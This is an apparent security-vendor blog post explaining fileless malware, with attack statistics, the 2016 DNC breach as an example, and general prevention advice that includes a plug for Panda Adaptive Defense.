In any corporate cybersecurity awareness strategy, employees have one fundamental commandment: they must never open an attachment if they aren’t 100% convinced that it is safe. If they ignore this rule, downloading or opening the file could cause an IT security crisis in the whole company.
But what happens when the malware flooding a computer isn’t hidden away inside a file. What if it’s inserted into a hard to detect process? This is exactly what happens when companies come up against fileless malware.
What is fileless malware?
Fileless malware is when the malware in question doesn’t get onto our computers through a specific document, but rather is installed within the RAM of the computer itself, and is developed using different processes.
Once it is executed, there are several ways that this cybercriminal technique can act on a computer: Anthrax affects the files on the system; Phasebot acts as a malware configuration kit for other cybercriminals; and Poweliks alters the servers to open new entry points for infections, to give but a few examples.
With this tactic, fileless malware makes itself hard for the user in question to detect, and also escapes detection by cybersecurity solutions that are not specifically prepared to detect this kind of intrusion.
35% of attacks in 2018
Despite being far less well-known than other attacks, fileless malware is currently experiencing a boom that is starting to look worrying. According to a study from the Ponemon Institute, fileless malware was responsible for 29% of all cyberattacks in 2017 worldwide, and by the end of 2018, this figure will have climbed to 35%.
This mode of cyberattack is especially dangerous in the business environment, since, once installed on the RAM, the fileless malware attacks more effectively via computers that are left on 24 hours a day, and can even reach the servers that affect the whole company, provoking a chain reaction.
In any case, these attacks can affect any kind of organization. This is precisely what happened to the Democratic National Committee in the US in mid-2016. An activist known as Guccifer 2.0 inserted a piece of fileless malware into the DNC’s system, and gained access to 19,252 emails and 8,034 attachments. The outcome of this intrusion was the publication by WikiLeaks of a series of revelations that ended up hindering Hillary Clinton, Donald Trump’s then rival.
How to avoid fileless malware
The relentless growth of this kind of cybercrime is forcing companies to take measures to avoid new infections. Some of the most vital steps are the following:
1.- Be cyber-resilient. The most obvious, but also most important, tip: cybercrime repurposes and reinvents its strategies on a daily basis. Therefore, any company that wants to protect their corporate cybersecurity must be cyber-resilient and stay up-to-speed with new kinds of attacks.
2.- Adapted solutions. The greatest advantage that fileless malware has on its side is the fact that, as it does not operate from a file, but rather from the RAM, it is undetectable for many vulnerability capturing solutions. Panda Adaptive Defense, however, analyzes and monitors all suspicious processes, whether in specific files on the endpoint, or in the memory itself.
3.- Scripting languages. Fileless malware very often takes advantage of the existence of tools that invoke scripting languages such as Powershell. Wherever possible, companies should forgo these languages.
4.- Careful with macros. Macros are one of the most common tools on any computer, but they can also be a possible point of entry for this kind of cybercrime. As with scripting languages, it is not necessary that companies forgo all kinds of macros, but they do need to be responsible when using them.